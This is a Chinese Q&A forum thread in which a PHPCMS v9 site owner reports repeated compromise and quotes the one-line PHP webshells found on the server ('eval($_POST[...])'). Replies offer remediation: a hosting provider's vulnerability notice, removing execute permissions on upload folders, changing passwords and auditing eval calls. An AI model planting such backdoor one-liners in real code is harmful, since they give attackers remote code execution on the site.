消息关闭
    暂无新消息!

网站近来频繁遭遇黑客攻击,请求PHP大神给予协助,厘清思路,以助早日找到漏洞,解决烦忧!

现将事件经过陈述如下:

1、网站采用PHPCMS_V9_5.20默认版本搭建。

2、所有文件起先均以全开放权限存于服务器根目录。

3、后来网站被黑,入口文件api.php和index.php被改写。

4、植入病毒文件为:“一句话木马”。内容如下:

<?php @eval($_POST['dcs-19']);?>
<?php

5、发现问题,删除以后,将此类文件的权限锁死,以为就能解决问题。可是隔几日,发现网站的快照被劫持,遂又查杀了一次木马,结果显示,木马文件所在位置为服务器根目录下uploadfile20170527文件夹中,此文件为后台上传附件或更新文章时按照日期自动生成。但是5月27日这天并没有更新文章,却出现了,请求大神给予协助,排查网站问题根源所在。

木马内容为:

<?php eval($_POST[1]);?>
ok

另附:在网上查询了相关内容,大多数说是网站程序漏洞所致的sql注入攻击,提示修复漏洞,但是怎么修复啊?PHP版本在线升级会有用吗?

本人小白非技术出生,很多东西都不懂,说的不明白的地方,问答中,我再按照你们的指示补充!


5个回答

︿ 2

关于PHPCMS漏洞的通知
尊敬的用户:
您好!
今年四月份PHPCMS程序被曝出的最新漏洞,可以通过修改会员注册参数向网站注入PHP木马文件。通过我司测试发现,注册会员时,PHPCMS会将注册信息进行加密,然后再传递到服务器上进行会员注册操作,由于加密方式暂时无法破解,因此我司无法通过匹配对应的关键词来拦截黑客入侵;
目前解决方案有三种:

  1. 升级到最新的PHPCMS程序;

  2. 关闭网站上的会员注册功能;

  3. 取消uploadfile目录的执行权限(此方法可以避免木马执行,但无法避免木马文件上传);
    执行上述任一方案后,请彻底检查uploadfile目录及子目录,是否含有PHP文件,此目录为上传图片的图片保存目录,如果发现存在PHP文件,则一定为木马文件!请及时删除!

景安网络
2017.6.19

︿ 1

换服务器密码,换SSH默认端口,能换服务器换个服务器。换PHPCMS,5,6年前都停止更新了。肯定漏洞不少。

︿ 1

这句话代码原理很简单,POST指的是客户端传送过去的数据,eval表示将这些数据当成代码执行。
对于黑客来说就是只需要在你网页上的对话框输入代码,提交以后就会被实际执行。

这只是表征,也就是最后留下的后门,但是黑客如何进来留后门的,那可能性就太多了,说不定上传功能有漏洞,ftp密码被破,管理员权限被获取,等等。最后留下这句木马只是下次使用方便而已。

最起码的需要做的,是整套代码下载下来,遍历一遍所有代码,查到所有 eval 相关的地方,如非本身程序必须,全部处理掉,不然你这边删一个,人家在别的地方重新上传一个,没完没了了。第二就是堵住系统管理漏洞,服务器各项组件能更新的就更新,所有密码全都改掉使用随机强密码,然后在服务器装个杀毒软件,我记得以前用过 Linux 服务器一个开源的。。忘了名字你搜索下就好。

最后,实在不行就交给专业的人处理,看投资值不值得了,我记得外国有网站是提供木马查杀,变动监控服务的,好像一两百美金一年,挺贵。国内不知道有没有相同的服务。

︿ 0

权限问题,你的上传目录开了可执行权限。
解决问题的方法么,排除PHPCMS的漏洞之外,你需要将所以外部文件(不是你自己写的或者框架的代码)目录的可执行权限去掉。

chmod -R 644 upload
︿ 0

楼上两位回复:你的上传目录开了可执行权限取消uploadfile目录的执行权限
这是什么意思?都取消目录执行权限了,目录都打不开,自己要上传图片都上传不了,那还行?